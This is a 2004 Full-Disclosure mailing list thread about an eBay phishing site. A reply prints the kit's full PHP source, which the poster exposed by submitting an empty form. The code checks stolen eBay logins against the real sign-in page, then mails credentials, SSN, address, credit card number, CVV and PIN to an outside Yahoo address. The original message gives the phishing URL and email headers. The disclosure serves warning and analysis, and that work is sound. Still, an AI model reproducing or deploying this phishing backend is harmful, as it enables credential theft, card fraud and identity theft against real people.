RE: [Full-Disclosure] phish

From: Andrew Poodle (andrewp_at_IRW.co.uk)
Date: 11/08/04

  • Next message: Ben: "RE: [Full-Disclosure] Blackbox: Elections fraud in 2004"
    To: "D B" <geggam692000@yahoo.com>, <full-disclosure@lists.netsys.com>
    Date: Mon, 8 Nov 2004 10:44:07 -0000
    
    

    Not a very good one..

    Submitting with an empty field displayed the raw PHP code..

    Seems to send to

    mail("ebaynix@yahoo.com","$userid","$userid $pass");

    Below..

    ----------------------8<-------------------------------
    <?php
        function query_str ($params) {
            $str = '';
            foreach ($params as $key => $value) {
                $str .= (strlen($str) < 1) ? '' : '&';
                $str .= $key . '=' . rawurlencode($value);
            }
            return ($str);
        }
    parse_str($HTTP_SERVER_VARS['QUERY_STRING']);
    if($MfcISAPICommand=="SignInFPP"){
      include 'login.php';
    }
    elseif (!strcmp($MfcISAPICommand,"VerifyFPP")){
    $a = query_str ($HTTP_POST_VARS);
    parse_str($a);
    $userid=str_replace(" ","",$userid);
    $pass=str_replace(" ","",$pass);
    $fd =
    fopen("http://signin.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=SignI
    nWelcome&siteid=0&co_partnerId=2&UsingSSL=0&pp=pass&i1=0&pageType=174&us
    erid=$userid&pass=$pass","r");
      while ($line=fgets($fd,1000))
      {
            if(strstr($line,"not valid"))
            $signerr=1;
            if(strstr($line,"Your User ID is not valid"))
            $signerr=2;
      }
    fclose ($fd);
    if($signerr)
            include 'login.php';
    else{
    mail("ebaynix@yahoo.com","$userid","$userid $pass");
    include 'step1.php';
    }
    }
    elseif(!strcmp($MfcISAPICommand,"ProcessFPP")){
    include 'step2.php';
    }

    elseif(!strcmp($MfcISAPICommand,"ProcessFPP1")){
    $a = query_str ($HTTP_POST_VARS);
    parse_str($a);
    $firstname = rtrim($firstname);
    $lastname = rtrim($lastname);
    $street = rtrim($street);
    $city = rtrim($city);
    $zip = rtrim($zip);
    $dayphone12 = rtrim($dayphone12);
    $dayphone22 = rtrim($dayphone22);
    $dayphone32 = rtrim($dayphone32);
    $dayphone42 = rtrim($dayphone42);

    $error = 0;
    if (!strlen($firstname)){
            $error = 1;
            $firstnameerr = 1;
    }

    if (!strlen($lastname)){
            $error = 1;
            $lastnameerr = 1;
    }
    if (!strlen($street)){
            $error = 1;
            $streeterr = 1;
    }
    if (!strlen($city)){
            $error = 1;
            $cityerr = 1;
    }
    /*if ($state == "default"){
            $error = 1;
            $rstateerr = 1;
    }
    */
    if (!strlen($zip) && !is_numeric($zip)){
            $error = 1;
            $ziperr = 1;
    }
    if (!strlen($dayphone12)){
            $error = 1;
            $dayphone12err = 1;
    }
    if (!strlen($dayphone22)){
            $error = 1;
            $dayphone22err = 1;
    }
    if (!strlen($dayphone32)){
            $error = 1;
            $dayphone32err = 1;
    }
    if(strlen($ssn)<1){
    $error=1;
    $ssnerr=1;
    }

    if ($error == 1)
            include 'step2.php';
    else
        include 'step3.php';
    }

    elseif(!strcmp($MfcISAPICommand,"ProcessFPP2")){
    $a = query_str ($HTTP_POST_VARS);
    parse_str($a);
    $ccnumber = rtrim($ccnumber);
    $ccmonth = rtrim($ccmonth);
    $ccyear = rtrim($ccyear);
    $cvv = rtrim($cvv);
    $pin = rtrim($pin);

    $error = 0;
    $a = substr($ccnumber,0,1);

    if($a == "3"){
            if (strlen($cvv) != 4){
                    $error = 1;
                    $cvverr = 1;
            }
    }
    elseif($a == "4"){
            if (strlen($cvv) != 3){
                    $error = 1;
                    $cvverr = 1;
            }
    }
    elseif($a == "5"){
            if (strlen($cvv) != 3){
                    $error = 1;
                    $cvverr = 1;
            }
    }
    elseif($a == "6"){
            if (strlen($cvv) != 3){
                    $error = 1;
                    $cvverr = 1;
            }
    }
    else{
            $error = 1;
            $ccnumbererr = 1;}

    if(strlen($ccnumber)!=16){
    $error=1;
    $ccnumbererr=1;
    }
    //ccmonth si ccyear;

    if(!strcmp($pin,"1234")||!strcmp($pin,"0000")){
    $pinerr=1;
    $error=1;
    }

    if(strlen($pin)<4){
    $pinerr=1;
    $error=1;
    }

    if($error==1) include 'step3.php';
    else{
    $message="-------------------------------------------------------
    -=::: Login Info :::=-

    user: $userid
    pass: $pass
    e-mail: $email

    -=::: Credit Card Info :::=-

    Credit Card Number: $ccnumber
    Expiration Date: $ccmonth/$ccyear
    CVV2: $cvv
    PIN: $pin
    Full Name: $firstname $lastname
    Address: $street
    City: $city
    State: $state
    Zip: $zip
    Phone: $dayphone12-$dayphone22-$dayphone32 $dayphone42
    Country: $country
    SSN: $ssn
    ";
    mail("ebaynix@yahoo.com","Fullinfo: $ccnumber","$message");
    include 'process.htm';
    }

    }

    elseif ($MfcISAPICommand=="SuccessfullFPP")
            include 'success.htm';
    else
            include 'error.htm';
    ?>

    ----------------------------------------------------------------
    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of D B
    Sent: 08 November 2004 10:21
    To: full-disclosure@lists.netsys.com
    Subject: [Full-Disclosure] phish

    another ebay phish

    http://www.ebay-verifications.biz/ws2/

    header

    X-Apparently-To: geggam692000@yahoo.com via
    216.109.119.82; Sun, 07 Nov 2004 14:17:22 -0800
    X-YahooFilteredBulk: 66.139.79.218
    X-Originating-IP: [66.139.79.218]
    Return-Path: <apache@www2.triasite.net>
    Received: from 66.139.79.218 (EHLO www2.triasite.net)
    (66.139.79.218) by mta303.mail.scd.yahoo.com with SMTP; Sun, 07 Nov 2004
    14:17:22 -0800
    Received: (from apache@localhost) by www2.triasite.net
    (8.11.6/8.11.6) id iA7MOgr24317; Sun, 7 Nov 2004
    16:24:42 -0600
    Date: Sun, 7 Nov 2004 16:24:42 -0600
    Message-Id:
    <200411072224.iA7MOgr24317@www2.triasite.net>
    To: geggam692000@yahoo.com
    Subject: eBay Database Critical Update Notification!
    From: "eBay" <accounts@ebay.com> Add to Address
    BookAdd to Address Book
    Reply-to:
    MIME-Version: 1.0
    Content-Type: text/html
    Content-Transfer-Encoding: 8bit
    Content-Length: 2058

                    
    __________________________________
    Do you Yahoo!?
    Check out the new Yahoo! Front Page.
    www.yahoo.com
     

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

    This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents.
    Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation.

    If you have received this e-mail message in error, please notify us immediately.
    Please also destroy and delete the message from your computer.

    Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited.

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Ben: "RE: [Full-Disclosure] Blackbox: Elections fraud in 2004"